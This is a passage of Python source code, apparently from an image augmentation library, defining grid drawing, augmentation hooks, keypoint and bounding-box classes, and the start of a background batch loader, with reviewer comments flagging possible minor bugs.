    Combine multiple input images into a single grid image.

    Parameters
    ----------
    images : (N,H,W,3) ndarray or iterable of (H,W,3) array
        The input images to arrange in a grid.
        Expected to be RGB and have dtype uint8.
    rows : None or int, optional(default=None)
        Number of grid rows. Derived automatically if None.
    cols : None or int, optional(default=None)
        Number of grid columns. Derived automatically if None.

    Returns
    -------
    grid : (H',W',3) ndarray
        Image of the generated grid.
    """
    if is_np_array(images):
        do_assert(images.ndim == 4)
    else:
        do_assert(is_iterable(images) and is_np_array(images[0]) and images[0].ndim == 3)
    nb_images = len(images)
    do_assert(nb_images > 0)
    # every grid cell is as large as the largest input image
    cell_height = max(image.shape[0] for image in images)
    cell_width = max(image.shape[1] for image in images)
    channels = {image.shape[2] for image in images}
    do_assert(len(channels) == 1, "All images are expected to have the same number of channels, but got channel set %s with length %d instead." % (str(channels), len(channels)))
    nb_channels = list(channels)[0]
    # fill in missing grid dimensions
    if rows is None and cols is None:
        rows = cols = int(math.ceil(math.sqrt(nb_images)))
    elif rows is not None:
        cols = int(math.ceil(nb_images / rows))
    elif cols is not None:
        rows = int(math.ceil(nb_images / cols))
    do_assert(rows * cols >= nb_images)
    grid = np.zeros((cell_height * rows, cell_width * cols, nb_channels), dtype=np.uint8)
    for cell_idx in sm.xrange(nb_images):
        row_idx, col_idx = cell_idx // cols, cell_idx % cols
        image = images[cell_idx]
        y_off = cell_height * row_idx
        x_off = cell_width * col_idx
        grid[y_off:y_off + image.shape[0], x_off:x_off + image.shape[1], :] = image
    return grid
def show_grid(images, rows=None, cols=None):
    """
    Render the input images as a grid and display it in a new window.

    This wraps scipy.misc.imshow(), which requires the `see <image>`
    command to work. On Windows systems that tends not to be the case.

    Parameters
    ----------
    images : (N,H,W,3) ndarray or iterable of (H,W,3) array
        See `draw_grid()`.
    rows : None or int, optional(default=None)
        See `draw_grid()`.
    cols : None or int, optional(default=None)
        See `draw_grid()`.
    """
    misc.imshow(draw_grid(images, rows=rows, cols=cols))
def do_assert(condition, message="Assertion failed."):
    """
    Raise an AssertionError if `condition` is falsy.

    Provided because plain `assert` statements are stripped from optimized
    code; these checks should be kept even then.

    Parameters
    ----------
    condition : bool
        If False, an exception is raised.
    message : string, optional(default="Assertion failed.")
        Error message.
    """
    if condition:
        return
    raise AssertionError(str(message))
class HooksImages(object):
    """
    Class to intervene with image augmentation runs.

    This is e.g. useful to dynamically deactivate some augmenters.

    Parameters
    ----------
    activator : None or callable, optional(default=None)
        A function that gives permission to execute an augmenter.
        Expected interface: `f(images, augmenter, parents, default)`,
        where `images` are the input images to augment, `augmenter` is the
        augmenter instance to execute, `parents` are the previously
        executed augmenters and `default` is the value to return if the
        function makes no decision for the given inputs.
    propagator : None or callable, optional(default=None)
        A function that gives permission to propagate the augmentation
        further to the children of an augmenter. Runs after the activator;
        if the activator returned False, propagation is never attempted.
        Same interface as the activator.
    preprocessor : None or callable, optional(default=None)
        A function called before an augmenter performs any augmentations.
        Interface: `f(images, augmenter, parents)`. Expected to return the
        input images, optionally modified.
    postprocessor : None or callable, optional(default=None)
        A function called after an augmenter performed augmentations.
        Same interface as the preprocessor.

    Examples
    --------
    >>> seq = iaa.Sequential([
    >>>     iaa.GaussianBlur(3.0, name="blur"),
    >>>     iaa.Dropout(0.05, name="dropout"),
    >>>     iaa.Affine(translate_px=-5, name="affine")
    >>> ])
    >>>
    >>> def activator(images, augmenter, parents, default):
    >>>     return False if augmenter.name in ["blur", "dropout"] else default
    >>>
    >>> seq_det = seq.to_deterministic()
    >>> images_aug = seq_det.augment_images(images)
    >>> heatmaps_aug = seq_det.augment_images(
    >>>     heatmaps,
    >>>     hooks=ia.HooksImages(activator=activator)
    >>> )

    This augments images and their respective heatmaps in the same way.
    The heatmaps however are only modified by Affine, not by GaussianBlur
    or Dropout.
    """
    def __init__(self, activator=None, propagator=None, preprocessor=None, postprocessor=None):
        self.activator = activator
        self.propagator = propagator
        self.preprocessor = preprocessor
        self.postprocessor = postprocessor

    def is_activated(self, images, augmenter, parents, default):
        """
        Decide whether an augmenter may be executed.

        Returns
        -------
        out : bool
            True if the augmenter may be executed, False otherwise.
        """
        return default if self.activator is None else self.activator(images, augmenter, parents, default)

    # TODO is a propagating hook necessary? seems to be covered by activated
    # hook already
    def is_propagating(self, images, augmenter, parents, default):
        """
        Decide whether an augmenter may call its children to augment an
        image. This is independent of the augmenter itself possibly
        changing the image without calling its children.

        Returns
        -------
        out : bool
            True if propagation to children is allowed, False otherwise.
        """
        return default if self.propagator is None else self.propagator(images, augmenter, parents, default)

    def preprocess(self, images, augmenter, parents):
        """
        Called (per augmenter) before the augmentation of images starts.

        Returns
        -------
        out : (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
            The input images, optionally modified.
        """
        return images if self.preprocessor is None else self.preprocessor(images, augmenter, parents)

    def postprocess(self, images, augmenter, parents):
        """
        Called (per augmenter) after the augmentation of images finished.

        Returns
        -------
        out : (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
            The input images, optionally modified.
        """
        return images if self.postprocessor is None else self.postprocessor(images, augmenter, parents)
class HooksKeypoints(HooksImages):
    """
    Class to intervene with keypoint augmentation runs.

    This is e.g. useful to dynamically deactivate some augmenters.
    Currently identical to the hooks class for images; this may or may
    not change in the future.
    """
    pass
class Keypoint(object):
    """
    A single keypoint (aka landmark) on an image.

    Parameters
    ----------
    x : number
        Coordinate of the keypoint on the x axis.
    y : number
        Coordinate of the keypoint on the y axis.
    """
    def __init__(self, x, y):
        # type assertions were removed here because they were, for some
        # reason, very slow
        self.x = x
        self.y = y

    @property
    def x_int(self):
        # x coordinate, rounded to the nearest integer
        return int(round(self.x))

    @property
    def y_int(self):
        # y coordinate, rounded to the nearest integer
        return int(round(self.y))

    def project(self, from_shape, to_shape):
        """
        Project the keypoint onto a new position on a new image.

        E.g. if the keypoint is on its original image at x=(10 of 100
        pixels) and y=(20 of 100 pixels) and is projected onto a new image
        of size (width=200, height=200), its new position is (20, 40).
        Intended for cases where the original image is resized; it cannot
        handle more complex changes (e.g. padding, cropping).

        Parameters
        ----------
        from_shape : tuple
            Shape of the original image. (Before resize.)
        to_shape : tuple
            Shape of the new image. (After resize.)

        Returns
        -------
        out : Keypoint
            Keypoint object with new coordinates.
        """
        if from_shape[0:2] == to_shape[0:2]:
            return Keypoint(x=self.x, y=self.y)
        from_height, from_width = from_shape[0:2]
        to_height, to_width = to_shape[0:2]
        return Keypoint(
            x=(self.x / from_width) * to_width,
            y=(self.y / from_height) * to_height
        )

    def shift(self, x, y):
        """
        Move the keypoint around on an image.

        Parameters
        ----------
        x : number
            Move by this value on the x axis.
        y : number
            Move by this value on the y axis.

        Returns
        -------
        out : Keypoint
            Keypoint object with new coordinates.
        """
        return Keypoint(self.x + x, self.y + y)

    def __repr__(self):
        return self.__str__()

    def __str__(self):
        return "Keypoint(x=%.8f, y=%.8f)" % (self.x, self.y)
class KeypointsOnImage(object):
    """
    Object that represents all keypoints on a single image.
    Parameters
    ----------
    keypoints : list of Keypoint
        List of keypoints on the image.
    shape : tuple of int
        The shape of the image on which the keypoints are placed.
    Examples
    --------
    >>> kps = [Keypoint(x=10, y=20), Keypoint(x=34, y=60)]
    >>> kps_oi = KeypointsOnImage(kps, shape=image.shape)
    """
    def __init__(self, keypoints, shape):
        #assert len(shape) == 3, "KeypointsOnImage requires shape tuples of form (H, W, C) but got %s. Use C=1 for 2-dimensional images." % (str(shape),)
        self.keypoints = keypoints
        # `shape` may be passed as the image array itself (its .shape is
        # used) or as a tuple/list.
        if is_np_array(shape):
            self.shape = shape.shape
        else:
            do_assert(isinstance(shape, (tuple, list)))
            self.shape = tuple(shape)
    @property
    def height(self):
        # image height in pixels (shape[0])
        return self.shape[0]
    @property
    def width(self):
        # image width in pixels (shape[1])
        return self.shape[1]
    def on(self, image):
        """
        Project keypoints from one image to a new one.
        Parameters
        ----------
        image : ndarray or tuple
            New image onto which the keypoints are to be projected.
            May also simply be that new image's shape tuple.
        Returns
        -------
        keypoints : KeypointsOnImage
            Object containing all projected keypoints.
        """
        if is_np_array(image):
            shape = image.shape
        else:
            shape = image
        # same height/width -> nothing to project, just copy
        if shape[0:2] == self.shape[0:2]:
            return self.deepcopy()
        else:
            keypoints = [kp.project(self.shape, shape) for kp in self.keypoints]
            return KeypointsOnImage(keypoints, shape)
    def draw_on_image(self, image, color=[0, 255, 0], size=3, copy=True, raise_if_out_of_image=False): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
        """
        Draw all keypoints onto a given image. Each keypoint is marked by a
        square of a chosen color and size.
        Parameters
        ----------
        image : (H,W,3) ndarray
            The image onto which to draw the keypoints.
            This image should usually have the same shape as
            set in KeypointsOnImage.shape.
        color : int or list of ints or tuple of ints or (3,) ndarray, optional(default=[0, 255, 0])
            The RGB color of all keypoints. If a single int `C`, then that is
            equivalent to (C,C,C).
        size : int, optional(default=3)
            The size of each point. If set to C, each square will have
            size CxC.
        copy : bool, optional(default=True)
            Whether to copy the image before drawing the points.
        raise_if_out_of_image : bool, optional(default=False)
            Whether to raise an exception if any keypoint is outside of the
            image.
        Returns
        -------
        image : (H,W,3) ndarray
            Image with drawn keypoints.
        """
        if copy:
            image = np.copy(image)
        height, width = image.shape[0:2]
        for keypoint in self.keypoints:
            y, x = keypoint.y_int, keypoint.x_int
            if 0 <= y < height and 0 <= x < width:
                x1 = max(x - size//2, 0)
                # NOTE(review): clipping to width-1/height-1 means the
                # right-most column / bottom row is never painted -- confirm
                # whether that off-by-one is intentional.
                x2 = min(x + 1 + size//2, width - 1)
                y1 = max(y - size//2, 0)
                y2 = min(y + 1 + size//2, height - 1)
                image[y1:y2, x1:x2] = color
            else:
                if raise_if_out_of_image:
                    # NOTE(review): the message labels x=/y= but (y, x) is
                    # interpolated, so the reported coordinates appear
                    # swapped -- verify before relying on this message.
                    raise Exception("Cannot draw keypoint x=%.8f, y=%.8f on image with shape %s." % (y, x, image.shape))
        return image
    def shift(self, x, y):
        """
        Move the keypoints around on an image.
        Parameters
        ----------
        x : number
            Move each keypoint by this value on the x axis.
        y : number
            Move each keypoint by this value on the y axis.
        Returns
        -------
        out : KeypointsOnImage
            Keypoints after moving them.
        """
        keypoints = [keypoint.shift(x=x, y=y) for keypoint in self.keypoints]
        return KeypointsOnImage(keypoints, self.shape)
    def get_coords_array(self):
        """
        Convert the coordinates of all keypoints in this object to
        an array of shape (N,2).
        Returns
        -------
        result : (N, 2) ndarray
            Where N is the number of keypoints. Each first value is the
            x coordinate, each second value is the y coordinate.
        """
        result = np.zeros((len(self.keypoints), 2), np.float32)
        for i, keypoint in enumerate(self.keypoints):
            result[i, 0] = keypoint.x
            result[i, 1] = keypoint.y
        return result
    @staticmethod
    def from_coords_array(coords, shape):
        """
        Convert an array (N,2) with a given image shape to a KeypointsOnImage
        object.
        Parameters
        ----------
        coords : (N, 2) ndarray
            Coordinates of N keypoints on the original image.
            Each first entry (i, 0) is expected to be the x coordinate.
            Each second entry (i, 1) is expected to be the y coordinate.
        shape : tuple
            Shape tuple of the image on which the keypoints are placed.
        Returns
        -------
        out : KeypointsOnImage
            KeypointsOnImage object that contains all keypoints from the array.
        """
        keypoints = [Keypoint(x=coords[i, 0], y=coords[i, 1]) for i in sm.xrange(coords.shape[0])]
        return KeypointsOnImage(keypoints, shape)
    def to_keypoint_image(self, size=1):
        """
        Draws a new black image of shape (H,W,N) in which all keypoint coordinates
        are set to 255.
        (H=shape height, W=shape width, N=number of keypoints)
        This function can be used as a helper when augmenting keypoints with
        a method that only supports the augmentation of images.
        Parameters
        -------
        size : int
            Size of each (squared) point. Must be odd so the square is
            centered on the keypoint.
        Returns
        -------
        image : (H,W,N) ndarray
            Image in which the keypoints are marked. H is the height,
            defined in KeypointsOnImage.shape[0] (analogous W). N is the
            number of keypoints.
        """
        do_assert(len(self.keypoints) > 0)
        height, width = self.shape[0:2]
        image = np.zeros((height, width, len(self.keypoints)), dtype=np.uint8)
        # size must be odd so the square can be centered on the keypoint
        do_assert(size % 2 != 0)
        sizeh = max(0, (size-1)//2)
        for i, keypoint in enumerate(self.keypoints):
            # TODO for float values spread activation over several cells
            # here and do voting at the end
            y = keypoint.y_int
            x = keypoint.x_int
            x1 = np.clip(x - sizeh, 0, width-1)
            x2 = np.clip(x + sizeh + 1, 0, width-1)
            y1 = np.clip(y - sizeh, 0, height-1)
            y2 = np.clip(y + sizeh + 1, 0, height-1)
            #if 0 <= y < height and 0 <= x < width:
            #    image[y, x, i] = 255
            # the surrounding square is marked with 128, the exact center
            # pixel with 255 (drawn second so it overwrites the square)
            if x1 < x2 and y1 < y2:
                image[y1:y2, x1:x2, i] = 128
            if 0 <= y < height and 0 <= x < width:
                image[y, x, i] = 255
        return image
    @staticmethod
    def from_keypoint_image(image, if_not_found_coords={"x": -1, "y": -1}, threshold=1, nb_channels=None): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
        """
        Converts an image generated by `to_keypoint_image()` back to
        an KeypointsOnImage object.
        Parameters
        ----------
        image : (H,W,N) ndarray
            The keypoints image. N is the number of
            keypoints.
        if_not_found_coords : tuple or list or dict or None
            Coordinates to use for keypoints that cannot be found in `image`.
            If this is a list/tuple, it must have two integer values. If it
            is a dictionary, it must have the keys "x" and "y". If this
            is None, then the keypoint will not be added to the final
            KeypointsOnImage object.
        threshold : int
            The search for keypoints works by searching for the argmax in
            each channel. This parameters contains the minimum value that
            the max must have in order to be viewed as a keypoint.
        nb_channels : None or int
            Number of channels of the image on which the keypoints are placed.
            Some keypoint augmenters require that information.
            If set to None, the keypoint's shape will be set
            to `(height, width)`, otherwise `(height, width, nb_channels)`.
        Returns
        -------
        out : KeypointsOnImage
            The extracted keypoints.
        """
        do_assert(len(image.shape) == 3)
        height, width, nb_keypoints = image.shape
        # normalize if_not_found_coords into fallback x/y values (or a
        # drop flag when None was given)
        drop_if_not_found = False
        if if_not_found_coords is None:
            drop_if_not_found = True
            if_not_found_x = -1
            if_not_found_y = -1
        elif isinstance(if_not_found_coords, (tuple, list)):
            do_assert(len(if_not_found_coords) == 2)
            if_not_found_x = if_not_found_coords[0]
            if_not_found_y = if_not_found_coords[1]
        elif isinstance(if_not_found_coords, dict):
            if_not_found_x = if_not_found_coords["x"]
            if_not_found_y = if_not_found_coords["y"]
        else:
            raise Exception("Expected if_not_found_coords to be None or tuple or list or dict, got %s." % (type(if_not_found_coords),))
        keypoints = []
        for i in sm.xrange(nb_keypoints):
            # each channel encodes one keypoint; its position is the argmax
            # of that channel, accepted only if it reaches the threshold
            maxidx_flat = np.argmax(image[..., i])
            maxidx_ndim = np.unravel_index(maxidx_flat, (height, width))
            found = (image[maxidx_ndim[0], maxidx_ndim[1], i] >= threshold)
            if found:
                keypoints.append(Keypoint(x=maxidx_ndim[1], y=maxidx_ndim[0]))
            else:
                if drop_if_not_found:
                    pass # dont add the keypoint to the result list, i.e. drop it
                else:
                    keypoints.append(Keypoint(x=if_not_found_x, y=if_not_found_y))
        out_shape = (height, width)
        if nb_channels is not None:
            out_shape += (nb_channels,)
        return KeypointsOnImage(keypoints, shape=out_shape)
    def copy(self):
        """
        Create a shallow copy of the KeypointsOnImage object.
        Returns
        -------
        out : KeypointsOnImage
            Shallow copy.
        """
        return copy.copy(self)
    def deepcopy(self):
        """
        Create a deep copy of the KeypointsOnImage object.
        Returns
        -------
        out : KeypointsOnImage
            Deep copy.
        """
        # for some reason deepcopy is way slower here than manual copy
        #return copy.deepcopy(self)
        kps = [Keypoint(x=kp.x, y=kp.y) for kp in self.keypoints]
        return KeypointsOnImage(kps, tuple(self.shape))
    def __repr__(self):
        return self.__str__()
    def __str__(self):
        return "KeypointsOnImage(%s, shape=%s)" % (str(self.keypoints), self.shape)
# TODO functions: square(), to_aspect_ratio(), extend()/add_border(), contains_point()
class BoundingBox(object):
    """
    An axis-aligned rectangular bounding box, given by its top-left corner
    (x1, y1) and bottom-right corner (x2, y2). Coordinates supplied in the
    wrong order are swapped during initialization.
    """
    def __init__(self, x1, y1, x2, y2):
        # normalize so that x1 < x2 and y1 < y2; zero-area boxes are rejected
        if x1 > x2:
            x2, x1 = x1, x2
        do_assert(x2 > x1)
        if y1 > y2:
            y2, y1 = y1, y2
        do_assert(y2 > y1)
        self.x1 = x1
        self.y1 = y1
        self.x2 = x2
        self.y2 = y2
    @property
    def x1_int(self):
        # left edge, rounded to the nearest integer
        return int(round(self.x1))
    @property
    def y1_int(self):
        # top edge, rounded to the nearest integer
        return int(round(self.y1))
    @property
    def x2_int(self):
        # right edge, rounded to the nearest integer
        return int(round(self.x2))
    @property
    def y2_int(self):
        # bottom edge, rounded to the nearest integer
        return int(round(self.y2))
    @property
    def height(self):
        # box height (y2 - y1)
        return self.y2 - self.y1
    @property
    def width(self):
        # box width (x2 - x1)
        return self.x2 - self.x1
    @property
    def center_x(self):
        # x coordinate of the box center
        return self.x1 + self.width/2
    @property
    def center_y(self):
        # y coordinate of the box center
        return self.y1 + self.height/2
    @property
    def area(self):
        # box area (height * width)
        return self.height * self.width
    def project(self, from_shape, to_shape):
        """
        Project the bounding box onto a new position on a new image.
        E.g. if the bounding box is on its original image at
        x1=(10 of 100 pixels) and y1=(20 of 100 pixels) and is projected onto
        a new image with size (width=200, height=200), its new position will
        be (x1=20, y1=40). (Analogous for x2/y2.)
        This is intended for cases where the original image is resized.
        It cannot be used for more complex changes (e.g. padding, cropping).
        Parameters
        ----------
        from_shape : tuple
            Shape of the original image. (Before resize.)
        to_shape : tuple
            Shape of the new image. (After resize.)
        Returns
        -------
        out : BoundingBox
            BoundingBox object with new coordinates.
        """
        if from_shape[0:2] == to_shape[0:2]:
            return self.copy()
        else:
            from_height, from_width = from_shape[0:2]
            to_height, to_width = to_shape[0:2]
            do_assert(from_height > 0)
            do_assert(from_width > 0)
            do_assert(to_height > 0)
            do_assert(to_width > 0)
            x1 = (self.x1 / from_width) * to_width
            y1 = (self.y1 / from_height) * to_height
            x2 = (self.x2 / from_width) * to_width
            y2 = (self.y2 / from_height) * to_height
            # projection may collapse the box to zero size; widen it back
            # to 1 pixel so the BoundingBox constructor's assertions hold
            if x1 == x2:
                if x1 == 0:
                    x2 += 1
                else:
                    x1 -= 1
            if y1 == y2:
                if y1 == 0:
                    y2 += 1
                else:
                    y1 -= 1
            return self.copy(
                x1=x1,
                y1=y1,
                x2=x2,
                y2=y2
            )
    def extend(self, all_sides=0, top=0, right=0, bottom=0, left=0):
        # grow the box by the given amounts per side (all_sides applies to
        # every side in addition to the per-side values)
        return BoundingBox(
            x1=self.x1 - all_sides - left,
            x2=self.x2 + all_sides + right,
            y1=self.y1 - all_sides - top,
            y2=self.y2 + all_sides + bottom
        )
    def intersection(self, other, default=None):
        # intersection rectangle of two boxes; `default` is returned when
        # the boxes do not overlap
        x1_i = max(self.x1, other.x1)
        y1_i = max(self.y1, other.y1)
        x2_i = min(self.x2, other.x2)
        y2_i = min(self.y2, other.y2)
        if x1_i >= x2_i or y1_i >= y2_i:
            return default
        else:
            return BoundingBox(x1=x1_i, y1=y1_i, x2=x2_i, y2=y2_i)
    def union(self, other):
        # smallest box enclosing both boxes (not the area union)
        return BoundingBox(
            x1=min(self.x1, other.x1),
            y1=min(self.y1, other.y1),
            x2=max(self.x2, other.x2),
            y2=max(self.y2, other.y2)
        )
    def iou(self, other):
        # intersection-over-union; 0 for non-overlapping boxes
        # NOTE(review): the denominator is the *enclosing* box from union(),
        # not the set-union area -- confirm this matches callers' IoU
        # expectations.
        inters = self.intersection(other)
        if inters is None:
            return 0
        else:
            return inters.area / self.union(other).area
    def is_fully_within_image(self, image):
        # `image` may be an ndarray or a shape tuple
        if isinstance(image, tuple):
            shape = image
        else:
            shape = image.shape
        height, width = shape[0:2]
        return self.x1 >= 0 and self.x2 <= width and self.y1 >= 0 and self.y2 <= height
    def is_partly_within_image(self, image):
        # True if the box overlaps the image area at all
        if isinstance(image, tuple):
            shape = image
        else:
            shape = image.shape
        height, width = shape[0:2]
        img_bb = BoundingBox(x1=0, x2=width, y1=0, y2=height)
        return self.intersection(img_bb) is not None
    def is_out_of_image(self, image, fully=True, partly=False):
        # `fully`/`partly` select which out-of-image cases count as True
        if self.is_fully_within_image(image):
            return False
        elif self.is_partly_within_image(image):
            return partly
        else:
            return fully
    def cut_out_of_image(self, image):
        # clip the box to the image area
        if isinstance(image, tuple):
            shape = image
        else:
            shape = image.shape
        height, width = shape[0:2]
        do_assert(height > 0)
        do_assert(width > 0)
        x1 = np.clip(self.x1, 0, width)
        x2 = np.clip(self.x2, 0, width)
        y1 = np.clip(self.y1, 0, height)
        y2 = np.clip(self.y2, 0, height)
        # clipping may collapse the box to zero size; widen it back to
        # 1 pixel so the BoundingBox constructor's assertions hold
        if x1 == x2:
            if x1 == 0:
                x2 += 1
            else:
                x1 -= 1
        if y1 == y2:
            if y1 == 0:
                y2 += 1
            else:
                y1 -= 1
        return self.copy(
            x1=x1,
            y1=y1,
            x2=x2,
            y2=y2
        )
    def shift(self, top=None, right=None, bottom=None, left=None):
        # move the box away from the named side, e.g. `left=5` shifts it
        # 5 pixels to the right, `top=5` shifts it 5 pixels down
        top = top if top is not None else 0
        right = right if right is not None else 0
        bottom = bottom if bottom is not None else 0
        left = left if left is not None else 0
        return self.copy(
            x1=self.x1+left-right,
            x2=self.x2+left-right,
            y1=self.y1+top-bottom,
            y2=self.y2+top-bottom
        )
    def draw_on_image(self, image, color=[0, 255, 0], alpha=1.0, thickness=1, copy=True, raise_if_out_of_image=False): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
        # draw the box outline onto `image`; `thickness` expands the
        # rectangle outwards one pixel per iteration, `alpha` blends the
        # color with the existing pixels
        if raise_if_out_of_image and self.is_out_of_image(image):
            raise Exception("Cannot draw bounding box x1=%.8f, y1=%.8f, x2=%.8f, y2=%.8f on image with shape %s." % (self.x1, self.y1, self.x2, self.y2, image.shape))
        result = np.copy(image) if copy else image
        for i in range(thickness):
            y = [self.y1_int-i, self.y1_int-i, self.y2_int+i, self.y2_int+i]
            x = [self.x1_int-i, self.x2_int+i, self.x2_int+i, self.x1_int-i]
            rr, cc = draw.polygon_perimeter(y, x, shape=result.shape)
            if alpha >= 0.99:
                # effectively opaque: write the color directly
                result[rr, cc, 0] = color[0]
                result[rr, cc, 1] = color[1]
                result[rr, cc, 2] = color[2]
            else:
                if result.dtype in [np.float32, np.float64]:
                    # float images can be blended in place
                    result[rr, cc, 0] = (1 - alpha) * result[rr, cc, 0] + alpha * color[0]
                    result[rr, cc, 1] = (1 - alpha) * result[rr, cc, 1] + alpha * color[1]
                    result[rr, cc, 2] = (1 - alpha) * result[rr, cc, 2] + alpha * color[2]
                    result = np.clip(result, 0, 255)
                else:
                    # integer images: blend in float space, then cast back
                    input_dtype = result.dtype
                    result = result.astype(np.float32)
                    result[rr, cc, 0] = (1 - alpha) * result[rr, cc, 0] + alpha * color[0]
                    result[rr, cc, 1] = (1 - alpha) * result[rr, cc, 1] + alpha * color[1]
                    result[rr, cc, 2] = (1 - alpha) * result[rr, cc, 2] + alpha * color[2]
                    result = np.clip(result, 0, 255).astype(input_dtype)
        return result
    def extract_from_image(self, image):
        # extract the image area covered by the box; areas outside the
        # image are zero-padded first so the result always has the box size
        pad_top = 0
        pad_right = 0
        pad_bottom = 0
        pad_left = 0
        height, width = image.shape[0], image.shape[1]
        x1, x2, y1, y2 = self.x1_int, self.x2_int, self.y1_int, self.y2_int
        # if the bb is outside of the image area, the following pads the image
        # first with black pixels until the bb is inside the image
        # and only then extracts the image area
        # TODO probably more efficient to initialize an array of zeros
        # and copy only the portions of the bb into that array that are
        # natively inside the image area
        if x1 < 0:
            pad_left = abs(x1)
            x2 = x2 + abs(x1)
            x1 = 0
        if y1 < 0:
            pad_top = abs(y1)
            y2 = y2 + abs(y1)
            y1 = 0
        if x2 >= width:
            pad_right = x2 - (width - 1)
        if y2 >= height:
            pad_bottom = y2 - (height - 1)
        if any([val > 0 for val in [pad_top, pad_right, pad_bottom, pad_left]]):
            if len(image.shape) == 2:
                image = np.pad(image, ((pad_top, pad_bottom), (pad_left, pad_right)), mode="constant")
            else:
                image = np.pad(image, ((pad_top, pad_bottom), (pad_left, pad_right), (0, 0)), mode="constant")
        return image[y1:y2, x1:x2]
    def to_keypoints(self):
        # the four corners as Keypoint objects, clockwise from top-left
        return [
            Keypoint(x=self.x1, y=self.y1),
            Keypoint(x=self.x2, y=self.y1),
            Keypoint(x=self.x2, y=self.y2),
            Keypoint(x=self.x1, y=self.y2)
        ]
    def copy(self, x1=None, y1=None, x2=None, y2=None):
        # copy of this box; any coordinate given here overrides the
        # corresponding current value
        return BoundingBox(
            x1=self.x1 if x1 is None else x1,
            x2=self.x2 if x2 is None else x2,
            y1=self.y1 if y1 is None else y1,
            y2=self.y2 if y2 is None else y2
        )
class BoundingBoxesOnImage(object):
    """
    Object that represents all bounding boxes on a single image.
    Parameters
    ----------
    bounding_boxes : list of BoundingBox
        List of bounding boxes on the image.
    shape : tuple of int
        The shape of the image on which the bounding boxes are placed.
    Examples
    --------
    >>> bbs = [
    >>>     BoundingBox(x1=10, y1=20, x2=20, y2=30),
    >>>     BoundingBox(x1=25, y1=50, x2=30, y2=70)
    >>> ]
    >>> bbs_oi = BoundingBoxesOnImage(bbs, shape=image.shape)
    """
    def __init__(self, bounding_boxes, shape):
        self.bounding_boxes = bounding_boxes
        # `shape` may be passed as the image array itself (its .shape is
        # used) or as a tuple/list.
        if is_np_array(shape):
            self.shape = shape.shape
        else:
            do_assert(isinstance(shape, (tuple, list)))
            self.shape = tuple(shape)
    @property
    def height(self):
        # image height in pixels (shape[0])
        return self.shape[0]
    @property
    def width(self):
        # image width in pixels (shape[1])
        return self.shape[1]
    def on(self, image):
        """
        Project bounding boxes from one image to a new one.
        Parameters
        ----------
        image : ndarray or tuple
            New image onto which the bounding boxes are to be projected.
            May also simply be that new image's shape tuple.
        Returns
        -------
        bounding_boxes : BoundingBoxesOnImage
            Object containing all projected bounding boxes.
        """
        if is_np_array(image):
            shape = image.shape
        else:
            shape = image
        if shape[0:2] == self.shape[0:2]:
            # NOTE(review): deepcopy() is not defined on this class within
            # this file's view -- confirm it exists elsewhere, otherwise
            # this branch raises AttributeError.
            return self.deepcopy()
        else:
            bounding_boxes = [bb.project(self.shape, shape) for bb in self.bounding_boxes]
            return BoundingBoxesOnImage(bounding_boxes, shape)
    def draw_on_image(self, image, color=[0, 255, 0], alpha=1.0, thickness=1, copy=True, raise_if_out_of_image=False):
        """
        Draw all bounding boxes onto a given image.
        Parameters
        ----------
        image : (H,W,3) ndarray
            The image onto which to draw the bounding boxes.
            This image should usually have the same shape as
            set in BoundingBoxesOnImage.shape.
        color : int or list of ints or tuple of ints or (3,) ndarray, optional(default=[0, 255, 0])
            The RGB color of all bounding boxes. If a single int `C`, then that is
            equivalent to (C,C,C).
        alpha : float, optional(default=1.0)
            Alpha/transparency of the bounding box.
        thickness : int, optional(default=1)
            Thickness in pixels.
        copy : bool, optional(default=True)
            Whether to copy the image before drawing the points.
        raise_if_out_of_image : bool, optional(default=False)
            Whether to raise an exception if any bounding box is outside of the
            image.
        Returns
        -------
        image : (H,W,3) ndarray
            Image with drawn bounding boxes.
        """
        # each box draws onto the result of the previous one, so `copy`
        # only matters for the first iteration
        for bb in self.bounding_boxes:
            image = bb.draw_on_image(
                image,
                color=color,
                alpha=alpha,
                thickness=thickness,
                copy=copy,
                raise_if_out_of_image=raise_if_out_of_image
            )
        return image
    def remove_out_of_image(self, fully=True, partly=False):
        # drop boxes that are (fully and/or partly) outside the image
        bbs_clean = [bb for bb in self.bounding_boxes if not bb.is_out_of_image(self.shape, fully=fully, partly=partly)]
        return BoundingBoxesOnImage(bbs_clean, shape=self.shape)
    def cut_out_of_image(self):
        # clip all boxes to the image area; boxes entirely outside are dropped
        bbs_cut = [bb.cut_out_of_image(self.shape) for bb in self.bounding_boxes if bb.is_partly_within_image(self.shape)]
        return BoundingBoxesOnImage(bbs_cut, shape=self.shape)
    def shift(self, top=None, right=None, bottom=None, left=None):
        # shift every box away from the named side (see BoundingBox.shift)
        bbs_new = [bb.shift(top=top, right=right, bottom=bottom, left=left) for bb in self.bounding_boxes]
        return BoundingBoxesOnImage(bbs_new, shape=self.shape)
############################
# Background augmentation
############################
class Batch(object):
    """Container pairing pre- and post-augmentation data for one batch.

    Parameters
    ----------
    images : None or (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
        The images to augment.
    keypoints : None or list of KeypointOnImage
        The keypoints to augment.
    data : anything
        Additional data that is saved in the batch and may be read out
        after augmentation, e.g. filepaths to each image in `images`.
        Useful because background augmentation may return batches out of
        their original order.
    """
    def __init__(self, images=None, keypoints=None, data=None):
        # Inputs exactly as supplied by the caller.
        self.images = images
        self.keypoints = keypoints
        # Outputs; populated later by the augmentation workers.
        self.images_aug = None
        self.keypoints_aug = None
        # Opaque user payload, carried through untouched.
        self.data = data
class BatchLoader(object):
    """
    Class to load batches in the background.
    Loaded batches can be accessed using `BatchLoader.queue`.
    Parameters
    ----------
    load_batch_func : callable
        Function that yields Batch objects (i.e. expected to be a generator).
        Background loading automatically stops when the last batch was yielded.
    queue_size : int, optional(default=50)
        Maximum number of batches to store in the queue. May be set higher
        for small images and/or small batches.
    nb_workers : int, optional(default=1)
        Number of workers to run in the background.
    threaded : bool, optional(default=True)
        Whether to run the background processes using threads (true) or
        full processes (false).
    """
    def __init__(self, load_batch_func, queue_size=50, nb_workers=1, threaded=True):
        do_assert(queue_size > 0)
        do_assert(nb_workers >= 1)
        # Shared queue the consumers read pickled Batch objects from.
        self.queue = multiprocessing.Queue(queue_size)
